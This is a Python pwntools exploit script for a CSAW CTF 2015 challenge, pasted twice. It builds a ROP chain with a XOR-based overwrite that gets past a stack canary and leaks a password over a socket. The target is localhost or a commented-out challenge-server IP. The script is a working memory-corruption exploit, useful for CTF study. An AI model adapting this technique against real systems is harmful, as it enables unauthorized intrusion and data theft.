vanhoefm/csaw-ctf-2015_exploit-500.py

## csaw-ctf-2015_exploit-500.py
#!/usr/bin/env python2
from pwn import *


# Stack layout of vulnerable functions:
#
#	[   buffer of some length  ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
#

payload  = pack(0x08048740)			# send function -> send(socket, &password, 0x100, 0)
						#   will call func_72, with buffer of 0x84 bytes
payload += pack(0)				# next ROP chain
payload += pack(4)				# socket file descriptor
payload += pack(0x0805F0C0)			# address of password
payload += pack(0x100)				# length of password
payload += pack(0)				# flags for read call
payload += pack(0) * ((0x84-len(payload)) / 4)	# padding so we can now overwrite variables

log.info("Constructed stack frame of 0x%x bytes" % len(payload))


# stack layout when entering function:
#
#	[return-addr][buffer][size-read][???][???][???][???][bytes_read][buffer-data]
#
#	0xffffd63c:	0x08056afa	0xffffd65c	0x00000030	0x00000100
#	0xffffd64c:	0x00000000	0xf7ffda54	0x00000001	0x00000030
#	0xffffd65c:	0x08048740	0x00000000	0x00000004	0x0805F0C0
#

payload += pack(0) * 4				# skip canary, align, and saved-ebp
payload += pack(0x8056AFA ^ 0x80578F5)		# let XOR write address of ROP gadget "7-pop; ret"
payload += pack(0)				# ignore buffer pointer
payload += pack((len(payload) + 4 - 1) ^ 1)	# overwrite counter variable for early stop

r = remote('localhost', 24242)
#r = remote('54.152.37.20', 24242)
log.info("Sending {} bytes payload: {}".format(len(payload), repr(payload)))
r.send(payload)
r.interactive()
	#!/usr/bin/env python2
	from pwn import *


	# Stack layout of vulnerable functions:
	#
	# [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
	#

	payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0)
	# will call func_72, with buffer of 0x84 bytes
	payload += pack(0) # next ROP chain
	payload += pack(4) # socket file descriptor
	payload += pack(0x0805F0C0) # address of password
	payload += pack(0x100) # length of password
	payload += pack(0) # flags for read call
	payload += pack(0) * ((0x84-len(payload)) / 4) # padding so we can now overwrite variables

	log.info("Constructed stack frame of 0x%x bytes" % len(payload))


	# stack layout when entering function:
	#
	# [return-addr][buffer][size-read][???][???][???][???][bytes_read][buffer-data]
	#
	# 0xffffd63c: 0x08056afa 0xffffd65c 0x00000030 0x00000100
	# 0xffffd64c: 0x00000000 0xf7ffda54 0x00000001 0x00000030
	# 0xffffd65c: 0x08048740 0x00000000 0x00000004 0x0805F0C0
	#

	payload += pack(0) * 4 # skip canary, align, and saved-ebp
	payload += pack(0x8056AFA ^ 0x80578F5) # let XOR write address of ROP gadget "7-pop; ret"
	payload += pack(0) # ignore buffer pointer
	payload += pack((len(payload) + 4 - 1) ^ 1) # overwrite counter variable for early stop

	r = remote('localhost', 24242)
	#r = remote('54.152.37.20', 24242)
	log.info("Sending {} bytes payload: {}".format(len(payload), repr(payload)))
	r.send(payload)
	r.interactive()